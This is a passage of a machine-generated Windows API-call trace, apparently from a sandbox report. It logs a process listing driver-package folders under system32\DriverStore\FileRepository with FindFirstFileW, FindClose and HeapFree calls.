lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45ee3941, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b195e9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b195e9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.066] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.066] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxfalpal_ibv64.inf_amd64_neutral_4c42ac5f00413365\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45fc8183, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b3f749, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b3f749, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.069] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.069] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_fm1216mk5_ibv64.inf_amd64_neutral_3eaae75b591bd148\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4616b0a6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b8ba0a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b8ba0a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.071] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.072] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_fm1236mk5_ibv64.inf_amd64_neutral_b81bec917adfaea5\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46229787, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65bd7cca, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65bd7cca, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.074] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.074] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_philipstuv1236d_ibv64.inf_amd64_neutral_b6a3e57df5bad299\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x460ac9c4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b658a9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b658a9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.076] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.077] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dc21x4vm.inf_amd64_neutral_8887242a56ee027e\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43ee7166, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6218615f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6218615f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.077] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.077] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\digitalmediadevice.inf_amd64_neutral_6fd673519d66ab20\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fea1ef0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60f85ade, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60f85ade, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.078] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.078] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\disk.inf_amd64_neutral_10ce25bbc5a9cc43\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42c28403, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f24b5a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f24b5a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.078] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.078] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\display.inf_amd64_neutral_ea1c8215e52777a6\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a218705, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f89c6f4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f89c6f4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.079] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.079] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\divacx64.inf_amd64_neutral_fa0f82f024789743\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x397d4812, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f63b0ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f63b0ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.081] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.082] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dot4.inf_amd64_neutral_b89cfac15ccb2fba\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a0c1aa3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f82a2d3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f82a2d3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.084] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.084] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36ed0bf1, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b3d8a70, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b3d8a70, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.085] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.085] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\eaphost.inf_amd64_neutral_4506dea11740c089\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d20021d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x606e4b0e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x606e4b0e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.085] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.085] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ehstorcertdrv.inf_amd64_neutral_2e1cecffae9c899a\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fa9d9c8, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60f5f97d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60f5f97d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.086] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.086] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ehstorpwddrv.inf_amd64_neutral_ecd233d7cabbdebf\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3dde7033, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6083b770, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6083b770, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.087] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.087] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\elxstor.inf_amd64_neutral_4263942b9dfe9077\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x420d9b6f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61bded14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61bded14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.087] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.087] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxca003.inf_amd64_neutral_5b8c7c1dda79bef4\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b3a6966, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6013d6c3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6013d6c3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.089] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.090] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxcn001.inf_amd64_neutral_d23021a1eb548156\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b465047, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.091] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.091] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxcn002.inf_amd64_neutral_3d392ccc357e04db\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b4d7468, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.091] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.091] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\fdc.inf_amd64_neutral_bbcfca39fdc02275\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43a9697e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62113d3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62113d3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.092] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.092] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\flpydisk.inf_amd64_neutral_f54222cc59267e1e\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x439d829d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62113d3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62113d3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.095] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.095] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.095] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\gameport.inf_amd64_neutral_fe5c4f29488f121e\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e1eb55b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x608adb91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x608adb91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.096] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.096] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hal.inf_amd64_neutral_232b95977cf6d84c\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42eafb68, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f4acbb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f4acbb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.096] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.096] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.096] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw72b64.inf_amd64_neutral_023772237d3a4ade\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4656f5cd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65cbc50c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65cbc50c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.098] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.099] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.099] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw85b64.inf_amd64_neutral_22b436d5d06ab017\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463803e9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65c23f8b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65c23f8b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.100] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.101] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.101] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw85c64.inf_amd64_neutral_96b71557b416d04a\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4648ad8b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65cbc50c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65cbc50c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.102] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.102] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudbus.inf_amd64_neutral_4b99fffee061ff26\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3875ceff, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bbbb35f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bbbb35f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.103] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.104] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudio.inf_amd64_neutral_ce7bc199c85ae0a0\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36dc624f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b31a38f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b31a38f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.105] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.105] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudss.inf_amd64_neutral_330a593eb888237c\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e50b241, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6091ffb2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6091ffb2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.105] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.105] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidbth.inf_amd64_neutral_8a1323fc68ad84af\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d865d49, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607a31ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607a31ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 [0026.106] FindClose (in: hFindFile=0x5dbe08 | out: hFindFile=0x5dbe08) returned 1 [0026.106] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ea470 | out: hHeap=0x5a0000) returned 1 [0026.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hiddigi.inf_amd64_neutral_12aaf5742a9969da\\*", lpFindFileData=0x5ea470 | out: lpFindFileData=0x5ea470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43372771, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6200939c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6200939c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dbe08 